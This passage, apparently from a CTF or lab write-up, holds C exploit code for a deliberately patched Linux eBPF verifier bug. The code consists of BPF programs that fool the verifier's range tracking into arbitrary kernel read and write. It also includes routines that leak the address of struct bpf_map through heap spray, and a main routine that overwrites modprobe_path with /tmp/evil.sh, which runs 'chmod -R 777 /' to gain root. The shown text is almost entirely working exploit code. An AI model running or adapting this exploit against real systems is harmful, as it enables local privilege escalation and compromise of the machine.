BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } uint64_t bpf_map_addr = 0; int main() { srand(time(NULL)); mapfd = bpf_map_create(sizeof(uint64_t), 1); bpf_map_addr = leak_bpf_map_addr(); printf(&#34;[+] bpf_map_addr: 0x%016lx, &amp;bpf_map_elem = 0x%016lx\n&#34;, bpf_map_addr, bpf_map_addr + 0x110); const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET; printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); const char* new_modprobe = &#34;/tmp/evil.sh&#34;; const size_t new_modprobe_len = strlen(new_modprobe); printf(&#34;[*] Overwrite modprobe to %s\n&#34;, new_modprobe); for (size_t i = 0; i &lt; new_modprobe_len; i += 8) { aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i)); } { int fd = open(&#34;/proc/sys/kernel/modprobe&#34;, O_RDONLY); if (fd &lt; 0) { fatal(&#34;open(/proc/sys/kernel/modprobe)&#34;); } char modprobe[0x100]; read(fd, modprobe, sizeof(modprobe)); if (strncmp(modprobe, new_modprobe, new_modprobe_len)) { printf(&#34;[*] new modprobe: %s\n&#34;, modprobe); puts(&#34;[-] Failed to overwrite modprobe&#34;); return -1; } puts(&#34;[+] Successfully overwritten modprobe&#34;); } puts(&#34;[+] Get root&#34;); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;); return 0; }</code></pre></div> <h3 id="leaks">Leaks</h3> <h4 id="leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals">Leak addr of <code>struct bpf_map</code> using <code>adjust_ptr_min_max_vals</code></h4> <div class="collapsable-code"> <input id="546928317" type="checkbox" checked /> <label for="546928317"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">leak_bpf_map_using_adjust_ptr_min_max_vals.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd = -1; uint64_t leak_bpf_map_addr() { char verifier_log[0x10000]; uint64_t val = 0; bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = w1(r1) BPF_MOV64_REG(BPF_REG_0, BPF_REG_6), // r0 = r6 BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 += r1 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10), // *(u64*)(fp-0x10) = r0 // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // *(u64*)(fp-0x08) = 0 BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), // arg2 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // arg2 = arg2(fp)-0x08 // arg3(&amp;val) = fp-0x10 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // arg3 = arg3(fp)-0x10 // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // arg4 = 0 // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); return val - 1 - 0x110; } uint64_t bpf_map_addr = 0; int main() { srand(time(NULL)); char verifier_log[0x10000]; mapfd = bpf_map_create(sizeof(uint64_t), 1); bpf_map_addr = leak_bpf_map_addr(); printf(&#34;[+] bpf_map_addr: 0x%016lx, &amp;bpf_map_elem = 0x%016lx\n&#34;, bpf_map_addr, bpf_map_addr + 0x110); return 0; }</code></pre></div> <h4 id="leak-addr-of-struct-bpf_map-using-oob-read--heap-spray">Leak addr of <code>struct bpf_map</code> using oob read &amp; heap spray</h4> <div class="collapsable-code"> <input id="376148295" type="checkbox" checked /> <label for="376148295"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">leak_bpf_map_using_oob_read.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define BPF_MAP_OPS_LOOKUP_IDX 12 #define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8) #define BPF_MAP_OPS_UPDATE_ELEM_IDX 13 #define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd; int map_spray_fd[0x100]; void make_corrupted_map() { uint64_t map_val = 1; puts(&#34;[*] Spray struct bpf_map...&#34;); for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; i++) { map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1); bpf_map_update(map_spray_fd[i], 0, &amp;map_val); } mapfd = map_spray_fd[0x81]; char verifier_log[0x10000]; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = map_elem BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6), // arg3 = r6 == map_elem // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 0xf1 - 1), // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1; // val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } char buf[0x100] = { 0, }; // Overwrite low byte of bpf_map-&gt;ops // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63) memset(buf, &#39;a&#39;, 0xf0); buf[0xf0] = 0xa0 - 8; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); } int corrupted_map_fd; uint64_t bpf_map_addr; void find_corrupted_map_and_leak_bpf_map_addr() { char verifier_log[0x10000]; for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; ++i) { int cur_map_fd = map_spray_fd[i]; if (cur_map_fd == mapfd) { continue; } // uint64_t map_val = 0; // int ret = bpf_map_update(cur_map_fd, 0, &amp;map_val); // printf(&#34;ret: 0x%x, val: 0x%lx\n&#34;, ret, map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x10 &lt;- 0 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd, // fp-0x10) if corrupted BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x18 &lt;- return value of map_update_elem or // map_lookup_elem. BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x18, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); uint64_t val; bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); if (val != 0) { bpf_map_addr = val - 0x110; corrupted_map_fd = cur_map_fd; continue; } close(cur_map_fd); } } uint64_t aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); return buf[0]; } uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // 